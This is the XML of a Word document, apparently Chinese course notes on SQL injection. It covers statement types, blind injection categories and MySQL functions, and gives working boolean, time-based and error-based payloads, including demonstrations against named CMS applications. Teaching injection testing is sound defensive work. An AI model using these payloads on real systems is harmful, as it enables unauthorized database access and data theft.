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040D" w14:textId="77777777" w:rsidR="00436BA1" w:rsidRDefault="00436BA1" w:rsidP="00436BA1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-SQL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增删改查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盲注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延时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布尔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报错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有无回显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错误处理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审计复盘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAF6520" w14:textId="6674192A" w:rsidR="00436BA1" w:rsidRDefault="00436BA1" w:rsidP="00436BA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E4F7758" wp14:editId="033369F2">
            <wp:extent cx="5271135" cy="16478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66F4" w14:textId="77777777" w:rsidR="00436BA1" w:rsidRDefault="00436BA1" w:rsidP="00436BA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06C54888" w14:textId="4354C062" w:rsidR="00436BA1" w:rsidRDefault="00436BA1" w:rsidP="00436BA1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19A2203F" wp14:editId="4B7ADBF2">
            <wp:extent cx="5271135" cy="58483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2B1F" w14:textId="37CDCFFB" w:rsidR="00436BA1" w:rsidRDefault="00436BA1" w:rsidP="00436BA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BBBE0FB" wp14:editId="206758FE">
            <wp:extent cx="5274310" cy="2759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A6D" w14:textId="77777777" w:rsidR="00436BA1" w:rsidRDefault="00436BA1" w:rsidP="00436BA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10C12C3C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数据库类型利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCABBF5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参数类型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符号干扰</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45998EC1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参数格式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参数编码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F065968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增删改查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无回显报错</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A0B5B6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&amp;UA&amp;Cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D67D32C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-HTTP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头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&amp;XFF&amp;Referer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031D007A" w14:textId="77777777" w:rsidR="00436BA1" w:rsidRDefault="00436BA1" w:rsidP="00436BA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布尔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延时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报错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盲注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA7F25C" w14:textId="77777777" w:rsidR="00436BA1" w:rsidRDefault="00436BA1" w:rsidP="00436BA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数据库知识：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、数据库名，表名，列名，数据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、自带数据库，数据库用户及权限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、数据库敏感函数，默认端口及应用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、数据库查询方法（增加删除修改更新）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注入产生原理：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语句存在可控变量导致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影响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注入的主要因素：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、数据库类型（权限操作）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、数据操作方法（增删改查）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、参数数据类型（符号干扰）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、参数数据格式（加密编码等）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、提交数据方式（数据包部分）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、有无数据处理（无回显逻辑等）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常见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注入的利用过程：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、判断数据库类型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、判断参数类型及格式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、判断数据格式及提交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、判断数据回显及防护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、获取数据库名，表名，列名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、获取对应数据及尝试其他利用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白盒如何发现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、盲对所有参数进行测试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、整合功能点脑补进行测试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白盒参考后期代码审计课程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数据（一般是关键数据，如管理员）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案例说明：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在应用中，存在增删改查数据的操作，其中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语句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结构不一导致注入语句也要针对应用达到兼容执行，另外也需要明白黑盒中功能对应的操作方法；除此之外有无回显，报错都有关系，将影响到采用何种注入方式。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、功能：数据查询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查询：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 * FROM news where id=$id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、功能：新增用户，添加新闻等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增加：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INSERT INTO news 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字段名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 VALUES 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、功能：删除用户，删除新闻等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DELETE FROM news WHERE id=$id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、功能：修改用户，修改文章等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修改：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UPDATE news SET id=$id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盲注就是在注入过程中，获取的数据不能回显至前端页面。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我们需要利用一些方法进行判断或者尝试，这个过程称之为盲注。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解决：常规的联合查询注入不行的情况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我们可以知道盲注分为以下三类：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、基于布尔的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regexp,like,ascii,left,ord,mid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、基于时间的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延时判断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if,sleep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、基于报错的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报错回显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floor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updatexml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extractvalue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延迟：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sleep(1);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if(1&gt;2,sleep(1),0);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if(1&lt;2,sleep(1),0);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length(database())=7;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left(database(),1)='p';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left(database(),2)='pi';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substr(database(),1,1)='p';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substr(database(),2,1)='i';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ord(left(database(),1))=112;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and updatexml(1,concat(0x7e,(SELECT version()),0x7e),1)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extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));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like 'ro%'  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ro...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是否成立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regexp '^xiaodi[a-z]'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匹配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xiaodi...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if(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,5,0)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条件成立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5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返回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sleep(5)              #SQL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语句延时执行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秒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mid(a,b,c)   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开始，截取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字符串的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substr(a,b,c)       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开始，截取字符串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长度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left(database(),1)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database() #left(a,b)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从左侧截取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length(database())=8 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判断数据库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database()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名的长度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ord=ascii ascii(x)=97 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判断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ascii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码是否等于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97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br/>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:color w:val="1E6FFF"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>https://www.jianshu.com/p/bc35f8dd4f7c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https://www.cnblogs.com/impulse-/p/14227189.html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基于延时：都不需要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if(1=1,sleep(5),0)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基于布尔：有数据库输出判断标准条件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length(database())=6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基于报错：有数据库报错处理判断标准条件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 updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)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演示案例：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没报错和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insert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-x' or updatexml(1,concat(0x7e,(version())),0) or '#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有输出和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insert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没输出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-x' or length(database())=15#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没报错没输出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-x' or if(1=1,sleep(5),0)# x' or if((select database())='news_management',sleep(1),sleep(0))#'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实际案例：报错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xhcms-insert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' and updatexml(1,concat(0x7e,(SELECT version()),0x7e),1) and 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kkcms-delete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 if(1=1,sleep(5),0)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 length(database())=5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 if(ord(left(database(),1))=107,sleep(1),0)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 if(ord(substr(database(),2,1))=107,sleep(1),0)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、学员学就用：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注入文档</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68096314" w14:textId="77777777" w:rsidR="00436BA1" w:rsidRDefault="00436BA1" w:rsidP="00436BA1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9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4B2AD4D1" w14:textId="77777777" w:rsidR="00436BA1" w:rsidRDefault="00436BA1" w:rsidP="00436BA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11C86046" w14:textId="77777777" w:rsidR="006A7752" w:rsidRPr="00436BA1" w:rsidRDefault="006A7752"/>
    <w:sectPr w:rsidR="006A7752" w:rsidRPr="00436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96264"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A06E2F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D0"/>
    <w:rsid w:val="002168D0"/>
    <w:rsid w:val="00436BA1"/>
    <w:rsid w:val="006A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B0F79-1011-43C0-8C80-132A37EE9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436BA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36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36BA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36BA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36B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bc35f8dd4f7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qq.com/doc/DQ3Z6RkNpaUtMcE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2025-03-11T10:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-11T10:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>